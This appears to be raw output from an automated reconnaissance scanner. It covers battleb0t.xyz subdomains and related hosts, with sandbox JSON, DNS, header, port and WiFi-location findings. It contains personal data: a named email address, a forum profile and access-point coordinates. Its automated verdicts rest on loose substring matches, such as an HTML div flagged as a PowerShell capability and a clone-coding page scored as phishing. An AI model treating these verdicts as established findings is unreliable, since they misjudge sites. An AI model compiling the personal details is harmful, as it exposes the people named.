Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Jan 2 20:07:12.157 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:06:67:C4:B5:35:BC:02:1A:34:AD:6C:A4:
C6:E0:88:8E:0A:15:4F:7B:AF:4C:84:1D:15:95:9C:34:
C6:69:14:75:02:21:00:D6:5B:0E:91:76:65:0A:B8:EF:
EA:C9:50:39:9F:B1:18:05:1A:64:EC:3B:EF:73:22:11:
ED:D2:3B:B2:A5:63:2B
Signature Algorithm: sha256WithRSAEncryption
94:68:ec:5c:d2:7e:2d:82:58:3e:f0:cb:47:6a:10:74:ed:14:
31:55:d2:fc:07:ea:e6:b9:2b:a6:5d:fb:b0:be:2a:39:98:6e:
1b:fd:2d:97:20:dd:74:9f:d7:b0:2d:0e:14:3a:21:fd:55:19:
4d:bc:eb:97:a9:5a:64:1e:5e:ab:09:fd:8c:47:43:b4:97:96:
97:49:ac:a8:a8:ae:80:dc:40:88:24:da:62:81:70:26:c1:be:
e3:8b:70:a0:e6:b0:9f:c5:a7:45:00:28:1e:05:50:30:08:27:
e0:d5:e0:62:45:15:16:96:8c:13:de:49:ea:61:78:cb:7e:a1:
d5:93:da:97:f7:07:f3:be:42:4f:13:74:e1:ff:46:94:80:da:
f1:1d:04:f6:72:d0:2d:92:05:be:d4:04:69:d5:82:84:f9:5a:
ef:98:c5:5d:b0:27:36:45:cf:eb:71:54:9a:0d:6f:3c:49:23:
b6:9b:be:8a:ca:3c:4b:e8:78:6a:03:13:65:55:9c:8c:1b:f0:
fe:30:16:e0:6f:32:f7:3f:aa:f2:94:1e:87:e0:1f:d5:4c:32:
ca:75:84:5e:e4:d3:9f:f9:2a:a5:85:29:a3:9b:57:5a:6b:b7:
d0:02:0c:a9:a2:a4:01:0e:75:01:9b:03:39:3e:0b:d4:cf:11:
0e:ca:93:36
|
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | cloudflare.net |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | mery.robinson@ftb.ca.gov | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 25, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=a85668108cb3&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:3704:120:WilError_01"\n "SM0:3704:304:WilStaging_02"\n "Local\\SM0:3704:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:3704:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.122:443"\n "142.251.2.157:443"\n "151.101.0.176:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "142.251.46.164:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.2332.240.14325218193887401859"\n "msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.2332.240.5569041425166893211"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2332_1227727462\\shopping.js]- [targetUID: 00000000-00002332]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007076]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir2332_1139505351\\Ruleset Data]- [targetUID: 00000000-00002332]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: 00000000-00002332]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00002332]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\2332_751382652\\Filtering Rules]- [targetUID: 00000000-00002332]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\2332_1705320843\\edge_driver.js]- [targetUID: 00000000-00002332]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2332_1227727462\\edge_driver.js]- [targetUID: 00000000-00002332]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\2332_1705320843\\vendor.bundle.js]- [targetUID: 00 |
| 2023-05-12 03:03:38 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00x44.github.io |
| 2023-05-12 02:44:38 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Google Analytics | nuke.battleb0t.xyz |
| 2023-05-12 02:53:52 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["43CE:4ADD:8C38CD:9E6CB7:645D800F"], "Etag": ["W/\"64556a8c-239b\""], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-gig2250056-GIG"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683849232.554003,VS0,VE234"], "Connection": ["keep-alive"], "Via": ["1.1 varnish"], "X_Fastly_Request_Id": ["c52142f897e3b3bde7efbc782ee478e7cae3ad86"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8003::153 |
| 2023-05-12 03:09:44 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 126.97.148.34.bc.googleusercontent.com | 34.148.97.126 |
| 2023-05-12 02:53:03 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://pics.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | pics.battleb0t.xyz |
| 2023-05-12 02:55:46 | Linked URL - Internal | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | http://kekw.battleb0t.xyz/jar | 64.226.81.43 |
| 2023-05-12 02:59:56 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | korea@netflix.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://kangbinkwon.github.io/kangbinkwon-Netflix_clonecoding/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_6d4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_6d4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_6d4_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1748"\n "IsoScope_6d4_IE_EarlyTabStart_0xdf8_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6d4_ConnHashTable<1748>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_6d4_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1748"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.18.22.52:443"\n "69.16.175.10:443"\n "45.57.90.1:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "code.jquery.com"\n "kangbinkwon.github.io"\n "pro.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a class="authLinks lang" href="https://www.netflix.com/kr/login"></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<form class="cta-form" action="https://www.netflix.com/signup/registration?locale=ko-KR">" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<span class="lang"> . PC netflix.com ," (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/node/412" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://www.netflix.com/kr/login?nextpage=https%3A%2F%2Fwww.netflix.com%2Fyouraccount"" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://media.netflix.com/ko/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://jobs.netflix.com/" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://devices.netflix.com/ko/" class="footer-link"><span" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/termsofuse" class="footer-link"><span" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/privacy" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/corpinfo" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/ko/contactus" class="footer-link"><span class="lang"></span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://help.netflix.com/legal/notices" class="footer-link"><span class="lang"> </span></a>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<a href="https://www.netflix.com/kr/browse/genre/839338" class="footer-link"><span class="lang">Netflix" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")\n Found string "<div class="copy-text-block lang"> : korea@netflix.com</div>" (Indicator: "dir "; File: "urlref_httpskangbinkwon.github.iokangbinkwon-Netflix_clonecoding")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"card-01-hero-card_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "card-05_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "card-04-devices_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "cookieSetting_1_.png" has type "PNG image data 766 x 605 8-bit/color RGBA non-interlaced" and extension "png"\n "card-03-mobile_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "card-03-download_1_.gif" has type "GIF image data version 89a 100 x 100" and extension "gif"\n "card-03-boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced" and extension "png"\n "card-02-tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "card-01-hero-card_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "card-05_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "card-04-devices_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "cookieSetting_1_.png" has type "PNG image data 766 x 605 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "card-03-mobile_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001748]\n "card-03-download_1_.gif" has type "GIF image data version 89a 100 x 100"- [targetUID: N/A]\n "card-03-boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced"- [targetUID: N/A]\n "kangbinkwon-Netflix_clonecoding_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001748]\n "nficon2016_1_.ico" has type "MS Windows icon resource - 1 icon 64x64 32 bits/pixel"- [targetUID: N/A]\n "~DFF6F278D010A12D33.TMP" has type "data"- Location: [%TEMP%\\~DFF6F278D010A12D33.TMP]- [targetUID: 00000000-00001748]\n "~DF048C015CE4B792F4.TMP" has type "data"- Location: [%TEMP%\\~DF048C015CE4B792F4.TMP]- [targetUID: 00000000-00001748]\n "~DF0EACE11BF |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F1:84:FA) | 37.7642, -122.3993 |
| 2023-05-12 03:33:59 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
_Z19l
?_ILPJ
C $/@
0\Mjf!
/VppGp
ChPwap
fzcoAC
P6s>W
4q:P?
_6Wp@
T'V51
>Lv t0
qDXT<?95
@pjrR
_ij>g
rd-2mp
:!xn2@
V4vbR
isgWO
fROLL
3coz:
m"cccM
4Xnju
KWnk.
4 x"i
W3KJe:
886jm
"yuV @B
UcsPm
C8unz
TjZ\\
7I018
h>4vW
iEBYs
`jclr
B2sj$
\evww-R
' :PGJ
h-G>d
Nuvra
<z6mj3
zK/g_
DL$p'
` 24`
lBoyyy
ni6N_
j >fw
CKMzvy
LjsoM
/kuuQ?
qdjrg7
wwwtx
issIG
_Mf !z
?wKQ/
R RP"
H`4<j
/qdP9$
ZN\D@
nsn6L
LMihx
mIhtb\
<A>Qm
6<7.Hm
V3.j$`
WC@@\
t:10fW
lfLFY
>t<F:Si
ctr4z
1w5\A
Wcll2-
SvSif
l4es`t$'
6yxj:
c\s.O
@'-mG
.9397
4enn6wj
"`Jpi':
gcqu3
xjq9f
7`N.8
2HuNNJn
kWcU
OEj'`r
5<k@Q:
_-3"X
B'PtqJ
l$eUY
Sqf_8M
v:1?2
emm--A@h"Ew
\K0vw
f3U4eH
IDATX
Y>W'P
W \@46
nZ3JK | https://funny.battleb0t.xyz/images/ein_1.png |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTFiQVKTA (Net ID: E8:33:81:CE:14:60) | 37.751, -97.822 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Moneysavingexpert (Category: finance)
https://forums.moneysavingexpert.com/profile/ayhu | ayhu |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:32:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.9:8443 | 188.114.97.0/24 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | rathook.cc | 185.199.108.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, 